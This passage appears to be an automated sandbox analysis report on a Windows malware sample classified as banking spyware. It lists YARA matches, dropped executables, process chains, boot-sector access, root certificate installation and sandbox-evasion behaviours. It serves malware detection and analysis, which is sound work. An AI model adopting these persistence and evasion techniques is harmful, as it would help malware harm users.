Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: dxgidebug.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll			Jump to behavior

Yara signature match

Source: 0000000F.00000002.1022272308.00000000059A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000006.00000002.1010080806.0000000004870000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1010698141.0000000004790000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.4870000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.4790000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.10000000.8.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.4870000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.4790000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.5720000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 15.2.1E1C360C582DF797.exe.5270000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Classification label

Source: classification engine

Classification label: mal87.bank.spyw.evad.winEXE@13/17@4/2

Contains functionality for error logging

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008A6E5E GetLastError,FormatMessageW,

1_2_008A6E5E

Contains functionality to adjust token privileges (e.g. debug / backup)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A1870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_6D8A1870

Contains functionality to check free disk space

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Contains functionality to enum processes or threads

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Code function: 19_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

19_2_0040CE93

Contains functionality to instantiate COM classes

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Contains functionality to load and extract PE file embedded resources

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A86A0 LoadResource,LockResource,SizeofResource,

0_2_6D8A86A0

Creates files inside the program directory

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File created: C:\Program Files (x86)\71eza90awf48

Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log

Jump to behavior

Creates mutexes

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Creates temporary files

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\Users\user\AppData\Local\Temp\nsh2645.tmp

Jump to behavior

Might use command line arguments

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: sfxname		1_2_008BD42A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: sfxstime		1_2_008BD42A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: STARTDLG		1_2_008BD42A

PE file has an executable .text section and no other executable section

Source: h1GodtbhC8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Queries a list of all open handles

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

System information queried: HandleInformation

Jump to behavior

Reads ini files

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Sample is known by Antivirus

Source: h1GodtbhC8.exe	Virustotal: Detection: 27%
Source: h1GodtbhC8.exe	Metadefender: Detection: 16%
Source: h1GodtbhC8.exe	ReversingLabs: Detection: 64%

Sample reads its own file content

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File read: C:\Users\user\Desktop\h1GodtbhC8.exe

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s
Source: unknown	Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 137E5E97B7A1A176AEBB5BF742E73DAB C
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1607153318099.exe 'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt'
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'			Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Process created: C:\Users\user\AppData\Roaming\1607153318099.exe 'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Submission file is bigger than most known malware samples

Source: h1GodtbhC8.exe

Static file information: File size 4671378 > 1048576

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: h1GodtbhC8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.793214399.00000000008D2000.00000002.00020000.sdmp
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607153318099.exe, 00000013.00000002.995109481.000000000040F000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000002.794920585.000000000094E000.00000004.00000020.sdmp, SibClr.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source:	Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Unpacked PE file: 6.2.aliens.exe.4870000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Unpacked PE file: 15.2.1E1C360C582DF797.exe.4790000.5.unpack

Binary contains a suspicious time stamp

Source: initial sample

Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

File is packed with WinRar

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_4533906

Jump to behavior

PE file contains an invalid checksum

Source: 1E1C360C582DF797.exe.6.dr	Static PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exe	Static PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.dr	Static PE information: real checksum: 0xe6954 should be:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8DF9A8 push ecx; ret		0_2_6D8DF9BB
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BE0E4 push eax; ret		1_2_008BE102
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BEBA6 push ecx; ret		1_2_008BEBB9
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10014194 push 33000001h; retf		6_2_10014199
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10014296 push ebp; ret		6_2_10014297
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010579 push ecx; ret		6_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05748D9A push ecx; ret		15_2_05748DAD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574EB91 push ecx; ret		15_2_0574EBA4
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10014194 push 33000001h; retf		15_2_10014199
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10014296 push ebp; ret		15_2_10014297
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010579 push ecx; ret		15_2_1001058C
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E2F1 push ecx; ret		19_2_0040E301
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E340 push eax; ret		19_2_0040E354
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E340 push eax; ret		19_2_0040E37C

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 6.82101260035
Source: initial sample	Static PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d		6_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d		6_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		6_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d		15_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		15_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d		15_2_1001D7E0

Installs new ROOT certificates

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Drops PE files

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe			Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\nsh2646.tmp\Sibuia.dll			Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll			Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe			Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	File created: C:\Program Files (x86)\71eza90awf48\aliens.exe			Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll

Jump to dropped file

Contains functionality to read ini properties file for application configuration

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe

Code function: 15_2_0586BE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,

15_2_0586BE50

Boot Survival:

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d		6_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d		6_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		6_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d		15_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		15_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d		15_2_1001D7E0

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Code function: 19_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_0040C41D

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100202D0		6_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_057C5AA0		15_2_057C5AA0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100202D0		15_2_100202D0

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality to read device registry values (via SetupAPI)

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

6_2_10019780

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe

Jump to dropped file

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100202D0		15_2_100202D0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100202D0		6_2_100202D0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 940	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 1372	Thread sleep time: -30000s >= -30000s			Jump to behavior

Queries disk information (often used to detect virtual machines)

